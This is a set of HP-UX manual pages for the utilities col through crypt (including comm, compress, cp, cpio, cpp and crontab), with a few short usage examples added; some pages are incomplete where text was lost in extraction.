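
```shell
# nroff emboldens "b" as "b BACKSPACE b" and underlines "u" as "_ BACKSPACE u".
printf 'b\bbold _\bu_\bnderline\n' | col -b
# With -b, only the last character written at each position survives:
#   bold underline
```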
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, col behaves as if all internationalization variables are set to "C". See
environ (5).
EXAMPLES
col is used most often with nroff and tbl. A common usage is:
tbl filename | nroff -man | col | more -s
(very similar to the usual man(1) command). This command allows vertical bars and outer boxes to be
printed for tables. The file is run through the tbl preprocessor, and the output is then piped through
nroff, formatting the output using the -man macros. The formatted output is then piped through col,
which sets up the vertical bars and aligns the columns in the file. The file is finally piped through the
more command, which prints the output to the screen with underlining and highlighting substituted for
italic and bold typefaces. The -s option deletes excess space from the output so that multiple blank lines
are not printed to the screen.
SEE ALSO
nroff(1), tbl(1), ul(1), man(5).
NOTES
The input format accepted by col matches the output produced by nroff with either the -T37 or
-Tlp options. Use -T37 (and the -f option of col) if the ultimate disposition of the output of col is a
device that can interpret half-line motions, and -Tlp otherwise.
BUGS
Cannot back up more than 128 lines. Cannot back up across page boundaries.
There is a maximum limit for the number of characters, including backspaces and overstrikes, on a line.
The maximum limit is at least 800 characters.
Local vertical motions that would result in backing up over the first line of the document are ignored. As
a result, the first line must not have any superscripts.
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ systems.
STANDARDS CONFORMANCE
col: SVID2, SVID3, XPG2, XPG3
comb(1) comb(1)
NAME
comb - combine SCCS deltas
SYNOPSIS
comb [-p SID ] [-clist ] [-o] [-s] file ...
DESCRIPTION
comb generates a shell procedure that, when run, reconstructs the given SCCS files, typically saving
space by discarding unneeded deltas. If a directory is named, each SCCS file within it is pro-
cessed; non-SCCS files and unreadable files are silently ignored. The generated shell procedure is written
on the standard output.
Options
comb recognizes the following options. Each is explained as if only one named file is to be processed, but
the effects of any option apply independently to each named file.
-pSID The SCCS identification string (SID) of the oldest delta to be preserved; all older
deltas are discarded in the reconstructed file.
-s This option causes comb to generate a shell procedure which, when run, produces a
report giving, for each file: the file name, size (in blocks) after combining, original
size (also in blocks), and percentage change computed by:
100 × (original − combined) / original
It is recommended that this option be used before any SCCS files are actually com-
bined to determine exactly how much space is saved by the combining process.
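The percentage-change formula is ordinary integer arithmetic; for instance, a file that combines from 1200 blocks down to 900 blocks (values chosen purely for illustration):

```shell
original=1200
combined=900

# 100 x (original - combined) / original
echo $(( 100 * (original - combined) / original ))   # 25 (percent saved)
```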
If no options are specified, comb preserves only leaf deltas and the minimal number of ancestors needed
to preserve the tree.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
DIAGNOSTICS
Use sccshelp (1) for explanations.
WARNINGS
comb may rearrange the shape of the tree of deltas. Combining files may or may not save space; in fact,
it is possible for the reconstructed file to actually be larger than the original.
FILES
s.COMB????? Temporary file
comb????? Temporary file
SEE ALSO
admin(1), delta(1), get(1), sccshelp(1), prs(1), sh(1), sccsfile(4).
comm(1) comm(1)
NAME
comm - select or reject lines common to two sorted files
SYNOPSIS
comm [-[123] ] file1 file2
DESCRIPTION
comm reads file1 and file2 , which should be ordered in increasing collating sequence (see sort (1) and
Environment Variables below), and produces a three-column output:
Column 1: Lines that appear only in file1 ,
Column 2: Lines that appear only in file2 ,
Column 3: Lines that appear in both files.
If - is used for file1 or file2 , the standard input is used.
Options 1, 2, or 3 suppress printing of the corresponding column. Thus comm -12 prints only the lines
common to the two files; comm -23 prints only lines in the first file but not in the second; comm -123
does nothing useful.
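For example, with two small sorted files (contents chosen for illustration; in the default output, column 2 is preceded by one tab and column 3 by two tabs):

```shell
printf 'apple\nbanana\ncherry\n' > f1
printf 'banana\ncherry\ndate\n'  > f2

comm f1 f2      # three columns: apple | date | banana, cherry
comm -12 f1 f2  # only lines common to both: banana, cherry
comm -23 f1 f2  # only lines unique to f1: apple
```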
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence comm expects from the input files.
LC_MESSAGES determines the language in which messages are displayed.
If LC_MESSAGES is not specified in the environment or is set to the empty string, the value of LANG
determines the language in which messages are displayed. inter-
nationalization variable contains an invalid setting, comm behaves as if all internationalization variables
are set to ‘‘C’’. See environ (5).
EXAMPLES
The following examples assume that file1 and file2 have been ordered in the collating sequence
defined by the LC_COLLATE or LANG environment variable.
Print all lines common to file1 and file2 (in other words, print column 3):
comm -12 file1 file2
Print all lines that appear in file1 but not in file2 (in other words, print column 1):
comm -23 file1 file2
Print all lines that appear in file2 but not in file1 (in other words, print column 2):
comm -13 file1 file2
SEE ALSO
cmp(1), diff(1), sdiff(1), sort(1), uniq(1).
STANDARDS CONFORMANCE
comm: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
command(1) command(1)
NAME
command - execute a simple command
SYNOPSIS
command command_name [ argument ... ]
DESCRIPTION
command enables the shell to treat the arguments as a simple command, suppressing the shell function
lookup.
If command_name is not the name of a function, the effect of command is the same as omitting
command.
OPERANDS
command recognizes the following operands:
command_name The name of an HP-UX command or a shell built-in command.
argument One or more strings to be interpreted as arguments to command_name .
The command command is necessary to allow functions that have the same name as a command to call
the command (instead of a recursive call to the function).
Nothing in the description of command is intended to imply that the command line is parsed any
differently than any other simple command. For example,
command a | b ; c
is not parsed in any special way that causes | or ; to be treated other than a pipe operator or semicolon
or that prevents function lookup on b or c.
EXTERNAL INFLUENCES
Environment Variables
PATH determines the search path used during the command search.
RETURN VALUE
command exits with one of the following values:
• If command fails:
126 The utility specified by the command_name is found but not executable.
127 An error occurred in the command utility or the utility specified by
command_name is not found.
• If command does not fail:
The exit status of command is the same as that of the simple command specified by the
arguments:
command_name [ argument ... ]
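The failure codes can be observed directly (a sketch; the name used for the not-found case is assumed not to exist on the system):

```shell
command true
echo $?                          # 0: the exit status of true itself

command no_such_utility_xyz 2>/dev/null
echo $?                          # 127: utility not found
```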
EXAMPLES
Create a version of the cd command that always prints the name of the new working directory whenever
it is used:
cd() {
command "$@" >/dev/null
pwd
}
Circumvent the redefined cd command above, and change directories without printing the name of the
new working directory:
command cd
SEE ALSO
getconf(1), sh-posix(1), confstr(3C).
STANDARDS CONFORMANCE
command: XPG4, POSIX.2
compact(1) compact(1)
NAME
compact, uncompact, ccat - compact and uncompact files, and cat them
SYNOPSIS
compact [ name ...]
uncompact [ name ...]
ccat [ file ...]
DESCRIPTION
compact compresses the named files using an adaptive Huffman code. If no file names are given, stan-
dard input is compacted and sent to the standard output. compact operates as an on-line algorithm.
Each time a byte is read, it is encoded immediately according to the current prefix code. This code is an
optimal Huffman code for the set of frequencies seen so far. It is unnecessary to attach a decoding tree in
front of the compressed file because the encoder and the decoder start in the same state and stay syn-
chronized. Furthermore, compact and uncompact can operate as filters. In particular,
... | compact | uncompact | ...
operates as a (very slow) no-op.
When an argument file is given, it is compacted, the resulting file is placed in file .C, and file is unlinked.
The first two bytes of the compacted file code the fact that the file is compacted. These bytes are used to
prohibit recompaction.
The amount of compression to be expected depends on the type of file being compressed. Typical file size
reduction (in percent) through compression are: Text, 38%; Pascal Source, 43%; C Source, 36%; and
Binary, 19%.
uncompact restores the original file from a file compressed by compact. If no file names are specified,
standard input is uncompacted and sent to the standard output.
ccat cats the original file from a file compressed by compact, without uncompressing the file.
WARNINGS
On short-filename systems, the last segment of the file name must contain 12 or fewer characters to allow
space for the appended .C.
DEPENDENCIES
NFS
Access control list entries of networked files are summarized (as returned in st_mode by stat()), but
not copied to the new file (see stat (2)).
AUTHOR
compact was developed by Colin L. Mc Master.
FILES
*.C compacted file created by compact, removed by uncompact
SEE ALSO
compress(1), pack(1), acl(5), aclv(5).
Gallager, Robert G., ‘‘Variations on a Theme of Huffman,’’ I.E.E.E. Transactions on Information Theory ,
vol. IT-24, no. 6, November 1978, pp. 668 - 674.
compress(1) compress(1)
NAME
compress, uncompress, zcat, compressdir, uncompressdir - compress and expand data
SYNOPSIS
Compress Files
compress [-f|-z] [-d] [-v] [-c] [-V] [-b maxbits ] [ file ... ]
uncompress [-f] [-v] [-c] [-V] [ file ... ]
zcat [-V] [ file ... ]
DESCRIPTION
The following commands compress and uncompress files and directory subtrees as indicated:
compress Reduce the size of the named files using adaptive Lempel-Ziv coding. If reduc-
tion is possible, each file is replaced by a file of the same name with a .Z
suffix, retaining the ownership, modes, and modification time of the original.
If no file is specified, or if - is specified, standard input is compressed to the
standard output.
uncompress Restore the compressed files to original form. Resulting files have the original
filename, ownership, and permissions, and the .Z filename suffix is removed.
If no file is specified, or if - is specified, standard input is uncompressed to the
standard output.
zcat Restore the compressed files to the standard output, leaving the .Z files intact.
compressdir Compress all files within the named directories, as compress does.
uncompressdir Uncompress all files within the named directories, as uncompress does.
The amount of compression obtained depends on the size of the input, the number of bits per code (max-
bits ), and the distribution of common substrings. Typically, text such as source code or English
is reduced by 50-60 percent. Compression is generally much better than that achieved by Huffman cod-
ing.
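A typical round trip looks like this (a sketch; compress is not installed by default on every system, and the file name is arbitrary):

```shell
compress -v notes.txt     # replaces notes.txt with notes.txt.Z, reporting the reduction
zcat notes.txt.Z | head   # inspect the contents without expanding on disk
uncompress notes.txt.Z    # restores notes.txt and removes the .Z file
```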
EXTERNAL INFLUENCES
Environment Variables
If any internationalization variable contains an invalid setting, compress, uncompress, and zcat
behave as if all internationalization variables are set to "C". See environ (5).
RETURN VALUE
These commands return the following values upon completion:
0 Completed successfully.
1 An error occurred.
2 Last file is larger after (attempted) compression.
DIAGNOSTICS
Usage: compress [-f|-z] [-dvcV] [-b maxbits] [file ...]
Invalid options were specified on the command line.
filename too long to tack on .Z
The path name is too long to append the .Z suffix on the file sys-
tem on which the source file resides. Make the source file name shorter and try again.
SEE ALSO
compact(1), pack(1), acl(5).
STANDARDS CONFORMANCE
compress: XPG4
convert(1) convert(1)
NAME
convert - convert an audio file
SYNOPSIS
/opt/audio/bin/convert [source_file ] [target_file ] [-sfmt format ] [-dfmt format ]
[-ddata data_type ] [-srate rate ] [-drate rate ]
[-schannels number] [-dchannels number]
DESCRIPTION
This command converts audio files from one supported file format, data format, sampling rate, and
number of channels to another. The unconverted file is retained as a source file.
-sfmt format -dfmt format
are the file formats for the source and destination files. Each format can be one of these:
au Sun file format
snd NeXT file format
wav Microsoft RIFF Waveform file format
u MuLaw format
al ALaw format
l16 linear 16-bit format
lo8 offset (unsigned) linear 8-bit format
l8 linear 8-bit format
If you omit -sfmt, convert uses the header or filename extension in the source file. You can
omit -dfmt if you supply a filename extension for the destination file.
-ddata data_type
is the data type for the destination files. data_type can be one of these:
u MuLaw
al ALaw
l16 linear 16-bit
lo8 offset (unsigned) linear 8-bit data
l8 linear 8-bit data
If you omit -ddata, convert uses an appropriate data type, normally the data type of the source
file.
-srate rate -drate rate
are the number of samples per second for the source and destination file. Typical sampling rates
range from 8k to 11k (for voice quality) up to 44,100 (for CD quality). You can use k to indicate
thousands. For example, 8k means 8,000 samples per second.
If you omit -srate, convert uses a rate defined by the source file header or its filename exten-
sion. For a raw file with no extension, 8,000 is used. By playing the file, you can determine if 8,000
samples is too fast or too slow.
If you omit -drate, convert uses a sampling rate appropriate for the destination file format; if
possible, it matches the sampling rate of the source file.
-schannels number -dchannels number
are the number of channels in the source and destination files. Use 1 for mono; 2 for stereo. If -
schannels is omitted, convert uses the information in the header; for raw data files, it uses
mono.
If -dchannels is omitted, convert matches what was used for the source file (through the
header or -schannels option); for raw data files, it uses mono.
EXAMPLES
Convert a raw data file to a headered file.
cd /opt/audio/bin
convert beep.l16 beep.au
Convert a raw data file to a headered file when the source has no extension, was sampled at 11,025 per
second, and has stereo data.
cd /opt/audio/bin
convert beep beep.au -sfmt l16 -srate 11025 -schannels 2
To save disk space, convert an audio file with CD quality sound to voice quality sound.
cd /opt/audio/bin
convert idea.au idea2.au -ddata u -drate 8k -dchannels 1
AUTHOR
convert was developed by HP.
Sun is a trademark of Sun MicroSystems, Inc.
NeXT is a trademark of NeXT Computers, Inc.
Microsoft is a trademark of Microsoft Corporation.
SEE ALSO
audio(5), asecure(1M), aserver(1M), attributes(1), send_sound(1).
Using the Audio Developer’s Kit
cp(1) cp(1)
NAME
cp - copy files and directory subtrees
SYNOPSIS
cp [-f|-i] [-p] [-e extarg ] file1 new_file
cp [-f|-i] [-p] [-e extarg ] file1 [file2 ... ] dest_directory
cp [-f|-i] [-p] [-R|-r] [-e extarg ] directory1 [ directory2 ... ] dest_directory
DESCRIPTION
cp copies:
• file1 to new or existing new_file ,
• file1 to existing dest_directory,
• file1 , file2 , ... to existing dest_directory,
• directory subtree directory1 to new or existing dest_directory, or
• multiple directory subtrees directory1 , directory2 , ... to new or existing dest_directory.
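These forms can be exercised with throwaway names (an illustrative sketch):

```shell
echo data > file1

cp file1 new_file              # file to (new) file
mkdir dest
cp file1 new_file dest         # several files into an existing directory

mkdir tree && echo x > tree/a
cp -r tree dest                # subtree copied to dest/tree
```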
cp fails if file1 and new_file are the same (be cautious when using shell metacharacters). When destina-
tion is a directory, one or more files are copied into that directory. If two or more files are copied, the des-
tination must be a directory. When copying a single file to a new file, if new_file exists, its contents are
destroyed.
If the access permissions of the destination dest_directory or existing destination file new_file forbid writ-
ing, cp aborts and produces an error message ‘‘cannot create file ’’.
To copy one or more directory subtrees to another directory, the -r option is required. The -r option is
ignored if used when copying a file to another file or files to a directory.
If new_file is a link to an existing file with other links, cp overwrites the existing file and retains all
links. If copying a file to an existing file, cp does not change existing file access permission bits, owner,
or group. The last modification time of new_file (and last access time, if new_file did not
exist) and the last access time of the source file1 are set to the time the copy was made.
Options
-i (interactive copy) Cause cp to write a prompt to standard error and wait for a response before
copying a file that would overwrite an existing file. If the response from the standard input is
affirmative, the file is copied if permissions allow the copy. If the -i (interactive) and -f
(forced-copy) options are both specified, the -i option is ignored.
-f Force existing destination pathnames to be removed before copying, without prompting for
confirmation. This option has the effect of destroying and replacing any existing file whose name
and directory location conflicts with the name and location of the new file created by the copy
operation.
-p (preserve permissions) Causes cp to preserve in the copy as many of the modification time,
access time, file mode, user ID, and group ID as allowed by permissions.
-r (recursive subtree copy) Cause cp to copy the subtree rooted at each source directory to
dest_directory. If dest_directory exists, it must be a directory, in which case cp creates a direc-
tory within dest_directory with the same name as file1 and copies the subtree rooted at file1 to
dest_directory/file1 . An error occurs if dest_directory/file1 already exists. If dest_directory does
not exist, cp creates it and copies the subtree rooted at file1 to dest_directory. Note that cp
-r cannot merge subtrees.
Usually normal files and directories are copied. Character special devices, block special devices,
network special files, named pipes, symbolic links, and sockets are copied, if the user has access
to the file; otherwise, a warning is printed stating that the file cannot be created, and the file is
skipped.
dest_directory should not reside within directory1 , nor should directory1 have a cyclic directory
structure, since in both cases cp attempts to copy an infinite amount of data.
-R (recursive subtree copy) The -R option is identical to the -r option with the exception that
directories copied by the -R option are created with read, write, and search permission for the
owner. User and group permissions remain unchanged.
With the -R and -r options, in addition to regular files and directories, cp also copies FIFOs,
character and block device files and symbolic links. Only superusers can copy device files. All
other users get an error. Symbolic links are copied so the target points to the same location that
the source did.
Warning: While copying a directory tree that has device special files, use the -r option; other-
wise, an infinite amount of data is read from the device special file and is duplicated as a special
file in the destination directory occupying large file system space.
-e extarg
Specifies the handling of any extent attributes of the file[s] to be copied. extarg takes one of the
following values.
warn Issues a warning message if extent attributes cannot be copied, but copies the
file anyway.
ignore Does not copy the extent attributes.
force Fails to copy the file if the extent attributes cannot be copied.
Extent attributes cannot be copied if the files are being copied to a file system which does not
support extent attributes or if that file system has a different block size than the original. If -e
is not specified, the default value for extarg is warn.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters.
LANG and LC_CTYPE determine the local language equivalent of y (for yes/no queries). If any
internationalization variable contains an invalid setting, cp behaves as if all internationalization
variables are set to "C". See environ (5).
EXAMPLES
The following command moves the directory sourcedir and its contents to a new location (targetdir ) in the
file system. Since cp creates the new directory, the destination directory targetdir should not already
exist.
cp -r sourcedir targetdir && rm -rf sourcedir
The -r option copies the subtree (files and subdirectories) in directory sourcedir to directory targetdir .
The double ampersand (&&) causes a conditional action. If the operation on the left side of the && is
successful, the right side is executed (and removes the old directory). If the operation on the left of the
&& is not successful, the old directory is not removed.
This example is equivalent to:
mv sourcedir targetdir
To copy all files and directory subtrees in the current directory to an existing targetdir , use:
cp -r * targetdir
DEPENDENCIES
NFS
Access control lists of networked files are summarized (as returned in st_mode by stat()), but not
copied to the new file. When using mv or ln on such files, a + is not printed after the mode value when
asking for permission to overwrite a file.
AUTHOR
cp was developed by AT&T, the University of California, Berkeley, and HP.
SEE ALSO
cpio(1), ln(1), mv(1), rm(1), link(1M), lstat(2), readlink(2), stat(2), symlink(2), symlink(4), acl(5), aclv(5).
STANDARDS CONFORMANCE
cp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
cpio(1) cpio(1)
NAME
cpio - copy file archives in and out; duplicate directory trees
SYNOPSIS
cpio -o [-e extarg ] [achvxABC]
cpio -i[bcdfmrstuvxBPRSU6] [pattern ...]
cpio -p [-e extarg ] [adlmruvxU] directory
DESCRIPTION
The cpio command saves and restores archives of files on magnetic tape, other devices, or a regular file,
and copies files from one directory to another while replicating the directory tree structure. When cpio
completes processing the files, it reports the number of blocks written.
cpio -o (copy out, export) Read standard input to obtain a list of path names, and copy those files to
standard output together with path name and status information. The output is padded to a
512-byte boundary.
cpio -i (copy in, import) Extract files from standard input, which is assumed to be the result of a
previous cpio -o.
If pattern ..., is specified, only the files with names that match a pattern according to the
rules of Pattern Matching Notation (see regexp (5)) are selected. A leading ! on a pattern
indicates that only those names that do not match the remainder of the pattern should be
selected. Multiple patterns can be specified. The patterns are additive. If no pattern is
specified, the default is * (select all files). See the f option, as well.
Extracted files are conditionally created and copied into the current directory tree, as deter-
mined by the options described below. The permissions of the files match the permissions of
the original files when the archive was created by cpio -o unless the U option is used.
File owner and group are that of the current user unless the user has appropriate privileges,
in which case cpio retains the owner and group of the files of the previous cpio -o.
cpio -p (pass through) Read standard input to obtain a list of path names of files which are then
conditionally created and copied into the destination directory tree as determined by the
options described below. directory must exist. Destination path names are interpreted rela-
tive to directory .
With the -p option, when handling a link, only the link is passed and no data blocks are
actually read or written. This is especially noteworthy with cpio -pl, where it is very
possible that all the files are created as links, such that no blocks are written and "0 blocks"
is reported by cpio. (See below for a description of the -l option.)
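The pass-through mode can be sketched like this (GNU cpio syntax assumed; directory names are illustrative):

```shell
# Copy a directory tree with cpio -p; -d creates directories as needed,
# -m keeps modification times.
mkdir -p /tmp/pass_demo/old/sub
echo data > /tmp/pass_demo/old/sub/file.txt
mkdir -p /tmp/pass_demo/new
cd /tmp/pass_demo/old
find . -depth -print | cpio -pdm ../new
# With -pl instead, files would be hard-linked where possible and cpio
# would report "0 blocks", as noted above.
```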
Options
cpio recognizes the following options, which can be appended as appropriate to -i, -o, and -p. White
space and hyphens are not permitted between these options and -i, -o, or -p.
a Reset access times of input files after they are copied.
b Swap both bytes and half-words. Use only with -i. See the P option for details; see also
the s and S options.
c Write or read header information in ASCII character form for portability.
d Create directories as needed.
-e extarg
Specifies the handling of any extent attributes of the file(s) to be archived or copied.
extarg takes one of the following values.
warn Archive or copy the file and issue a warning message if extent attributes can-
not be preserved.
ignore Do not issue a warning message even if extent attributes cannot be preserved.
force Any file(s) with extent attributes will not be archived and a warning message
will be issued.
When using the -o option, extent attributes are not preserved in the archive. Further-
more, the -p option will not preserve extent attributes if the files are being copied to a
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−119
file system that does not support extent attributes. If -e is not specified, the default
value for extarg is warn.
f Copy in all files except those selected by pattern ....
h Follow symbolic links as though they were normal files or directories. Normally, cpio
archives the link.
l Whenever possible, link files rather than copying them. This option does not destroy
existing files. Use only with -p.
m Retain previous file modification time. This option does not affect directories that are
being copied.
r Rename files interactively. If the user types a null line, the file is skipped.
s Swap all bytes of the file. Use only with -i. See the P option for details; see also
the b and S options.
t Print only a table of contents of the input. No files are created, read, or copied.
u Copy unconditionally (normally, an older file does not replace a newer file with the same
name).
v Print a list of file names as they are processed. When used with the t option, the table
of contents looks like the output of an ls -l command (see ls (1)), and filename is
the path name of the file as recorded in the archive.
x Save or restore device special files. Since mknod() is used to recreate these files on a
restore, -ix and -px can be used only by users with appropriate privileges (see
mknod(2)). This option is intended for intrasystem (backup) use only. Restoring device
files from previous versions of the OS, or from different systems can be very dangerous.
cpio may prevent the restoration of certain device files from the archive.
A Suppress warning messages regarding optional access control list entries. cpio does not
back up optional access control list entries in a file’s access control list (see acl (5)). Nor-
mally, a warning message is printed for each file that has optional access control list
entries.
B Block input/output at 5120 bytes to the record (does not apply to cpio -p). This option
is meaningful only with data directed to or from devices that support variable-length
records such as magnetic tape.
C Have cpio checkpoint itself at the start of each volume. If cpio is writing to a stream-
ing tape drive with immediate-report mode enabled and a write error occurs, it normally
aborts and exits with return code 2. With this option specified, cpio instead automati-
cally restarts itself from the checkpoint and rewrites the current volume. Alternatively,
if cpio is not writing to such a device and a write error occurs, cpio normally continues
with the next volume. With this option specified, however, the user can choose to either
ignore the error or rewrite the current volume.
P Read a file written on a PDP-11 or VAX system (with byte-swapping) that did not use the
c option. Use only with -i. Files copied in this mode are not changed. Non-ASCII files
are likely to need further processing to be readable. This processing often requires
knowledge of file contents, and thus cannot always be done by this program. The b, s,
and S options can be used when swapping all the bytes on the tape (rather than just in
the headers) is appropriate. In general, text is best processed with P and binary data
with one of the other options.
R Resynchronize automatically when cpio goes "out of phase", (see the DIAGNOSTICS
section).
S Swap all half-words in the file. Use only with -i. See the P option for details; see also
the b and s options.
U Use the process’s file-mode creation mask (see umask(2)) to modify the mode of files
created, in the same manner as creat (2).
6 Process a UNIX Sixth-Edition-format file. Use only with -i.
Note that cpio archives created using a raw device file must be read using a raw device file.
When the end of the tape is reached, cpio prompts the user for a new special file and continues.
If you want to pass one or more metacharacters to cpio without the shell expanding them, be sure to
precede each of them with a backslash (\).
Device files written with the -ox option (such as /dev/tty03) do not transport to other implementa-
tions of HP-UX.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating pattern matching notation for file
name generation.
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters, and the charac-
ters matched by character class expressions in pattern matching notation.
LC_TIME determines the format and content of date and time strings output when listing the contents of
an archive with the v option.
LANG determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, cpio behaves as if all internationalization
variables are set to "C". See environ (5).
RETURN VALUE
cpio returns the following exit codes:
0 Successful completion. Review standard error for files that could not be transferred.
1 Error during resynchronization. Some files may not have been recovered.
2 Out-of-phase error. A file header is corrupt or in the wrong format.
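A script can branch on these exit statuses; a minimal sketch (GNU cpio assumed, which likewise uses nonzero codes for errors):

```shell
# Listing a valid archive succeeds; feeding cpio junk fails with a
# nonzero exit status.
echo hi > /tmp/rc_demo.txt
echo /tmp/rc_demo.txt | cpio -oc > /tmp/rc_demo.cpio
if cpio -ict < /tmp/rc_demo.cpio > /dev/null; then
    echo "archive is readable"
fi
if ! echo "not an archive" | cpio -ict > /dev/null 2>&1; then
    echo "cpio reported a bad archive"
fi
```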
DIAGNOSTICS
Out of phase--get help
Perhaps the "c" option should[n’t] be used
cpio -i could not read the header of an archived file. The header is corrupt or it was written in a
different format. Without the R option, cpio returns an exit code of 2.
If no file name has been displayed yet, the problem may be the format. Try specifying a different
header format option: null for standard format; c for ASCII; b, s, P, or S, for one of the byte-
swapping formats; or 6 for UNIX Sixth Edition.
Otherwise, a header may be corrupt. Use the R option to have cpio attempt to resynchronize the
file automatically. Resynchronizing means that cpio tries to find the next good header in the
archive file and continues processing from there. If cpio tries to resynchronize from being out of
phase, it returns an exit code of 1.
Other diagnostic messages are self-explanatory.
EXAMPLES
Copy the contents of a directory into a tape archive:
ls | cpio -o > /dev/rmt/c0t0d0BEST
Duplicate a directory hierarchy:
cd olddir
find . -depth -print | cpio -pd newdir
The trivial case
find . -depth -print | cpio -oB >/dev/rmt/c0t0d0BEST
can be handled more efficiently by:
find . -cpio /dev/rmt/c0t0d0BEST
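The -cpio operator of find is an HP-UX extension; on systems without it, the equivalent pipeline can be sketched as follows (GNU cpio assumed, with a regular file standing in for the tape device):

```shell
# Portable stand-in for `find . -cpio device`: let find produce the file
# list and cpio -oB do the blocking and writing.
mkdir -p /tmp/fdemo/d
echo x > /tmp/fdemo/d/f
cd /tmp/fdemo
find . -depth -print | cpio -ocB > /tmp/fdemo.cpio
cpio -ict < /tmp/fdemo.cpio     # table of contents of the new archive
```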
WARNINGS
Because of industry standards and interoperability goals, cpio does not support the archival of files
larger than 2 GB or files that have user/group IDs greater than 60 K. Files with user/group IDs greater
than 60 K are archived and restored under the user/group ID of the current process.
Do not redirect the output of cpio to a named cpio archive file residing in the same directory as the
original files belonging to that cpio archive. This can cause loss of data.
cpio strips any leading ./ characters in the list of file names piped to it.
Path names are restricted to PATH_MAX characters (see <limits.h> and limits (5)). If there are too
many unique linked files, the program runs out of memory to keep track of them. Thereafter, linking
information is lost. Only users with appropriate privileges can copy special files.
cpio tapes written on HP machines with the -ox[c] options can sometimes mislead (non-HP) versions of
cpio that do not support the x option. If a non-HP (or non-AT&T) version of cpio happens to be
modified so that the (HP) cpio recognizes it as a device special file, a spurious device file might be
created.
If /dev/tty is not accessible, cpio issues a complaint and exits.
The -pd option does not create the directory typed on the command line.
The -idr option does not make empty directories.
The -plu option does not link files to existing files.
POSIX defines a file named TRAILER!!! as an end-of-archive marker. Consequently, if a file of that
name is contained in a group of files being written by cpio -o, the file is interpreted as end-of-archive,
and no remaining files are copied. The recommended practice is to avoid naming files anything that
resembles an end-of-archive file name.
To create a POSIX-conforming cpio archive, the c option must be used. To read a POSIX-conforming
cpio archive, the c option must be used and the b, s, S, and 6 options should not be used. If the user
does not have appropriate privileges, the U option must also be used to get POSIX-conforming behavior
when reading an archive. Users with appropriate privileges should not use this option to get POSIX-
conforming behavior.
DEPENDENCIES
If the path given to cpio contains a symbolic link as the last element, this link is traversed and path
name resolution continues. cpio uses the symbolic link’s target, rather than that of the link.
SEE ALSO
ar(1), find(1), tar(1), cpio(4), acl(5), environ(5), lang(5), regexp(5).
STANDARDS CONFORMANCE
cpio: SVID2, SVID3, XPG2, XPG3
cpp(1) cpp(1)
NAME
cpp - the C language preprocessor
DESCRIPTION
The preferred way to invoke cpp is through the cc command, since the functionality of cpp may
someday be moved elsewhere. See m4(1) for a general macro processor.
An option that enlarges the preprocessor's internal buffers serves to eliminate the ‘‘Macro param
too large’’, ‘‘Macro invocation too large’’, ‘‘Macro param too large after substitution’’, ‘‘Quoted
macro param too large’’, ‘‘Macro buffer too small’’, and ‘‘Input line too long’’ diagnostics.
Text may follow #else and #endif directives to label matching #if−#endif pairs. This
makes it easier, when reading the source, to match #if, #ifdef, and #ifndef direc-
tives with their associated #endif directive.
#elif constant-expression
Equivalent to:
#else
#if constant-expression
#else Reverses the notion of the test directive that matches this directive. Thus, if lines previous
to this directive were ignored, the following lines appear in the output, and vice versa.
#ifdef name The lines following appear in the output if and only if name has been the subject of a pre-
vious #define directive.
#undef name Cause the definition of name (if any) to be forgotten from now on.
The test directives and the possible #else directives can be nested. cpp supports names up to 255 char-
acters in length.
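The test directives above can be exercised with any preprocessor; a sketch using the common -P flag, which suppresses line markers (the availability of a standalone cpp command is an assumption):

```shell
# Only the branch whose condition holds survives preprocessing.
cat > /tmp/cond.c <<'EOF'
#define LEVEL 2
#if LEVEL >= 3
high
#elif LEVEL >= 1
low
#else
none
#endif
EOF
cpp -P /tmp/cond.c
```

Only the line "low" is emitted.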
Notes
The macro substitution scheme has been changed. Previous versions of cpp saved macros in a macro
definition table whose table size is 128 000 bytes by default. The current version of cpp replaces this
macro definition table with several small buffers. The default size of the small buffers is 8 188 bytes.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of comments and string literals as single- or multibyte charac-
ters. If LC_CTYPE is not specified in the environment or is set to an empty string, it defaults to "C"
(see lang (5)). If any internationalization variable contains an invalid setting, cpp
behaves as if all internationalization variables are set to "C". See environ (5).
FILES
/usr/include Standard directory for #include files
SEE ALSO
m4(1).
STANDARDS CONFORMANCE
cpp: SVID2, SVID3, XPG2
crontab [file] Create or replace your crontab file by copying the specified file , or standard
input if file is omitted or - is specified as file , into the crontab directory.
A crontab file consists of lines of six fields each. The fields are separated by spaces
or tabs. The first five are integer patterns that specify the following:
minute The minute of the hour, 0−59
hour The hour of the day, 0−23
monthday The day of the month, 1−31
month The month of the year, 1−12
weekday The day of the week, 0−6, with 0 indicating Sunday
The sixth field is a string that is executed by cron at the specified times.
crontab(1) crontab(1)
Blank lines and those whose first non-blank character is # will be ignored.
cron invokes the command from the user’s HOME directory with the POSIX shell, (/usr/bin/sh). It
runs in the c queue (see queuedefs (4)).
If any internationalization variable contains an invalid setting, crontab behaves as if all international-
ization variables are set to "C". See environ (5). EDITOR determines the editor to be invoked when the -e
option is specified. The default editor is vi.
WARNINGS
Be sure to redirect the standard output and standard error from commands. If this is not done, any gen-
erated output or errors will be mailed to you.
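Putting the field layout and the redirection advice together, a crontab entry might look like this (the command path is illustrative):

```
# minute hour monthday month weekday command
0 2 * * 1-5 /home/user/bin/nightly_backup > /tmp/backup.log 2>&1
```

This runs the command at 2:00 a.m. on weekdays (1−5, Monday through Friday) with both output streams redirected.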
crypt(1) crypt(1)
NAME
crypt - encode/decode files
SYNOPSIS
crypt [ password ]
DESCRIPTION
crypt reads from the standard input and writes on the standard output. password is a key that
selects a particular transformation. If no password is given, crypt demands a key from the terminal
and turns off printing while the key is being typed in.
Files encrypted by crypt are compatible with those treated by the ed editor in encryption mode (see
ed(1)).
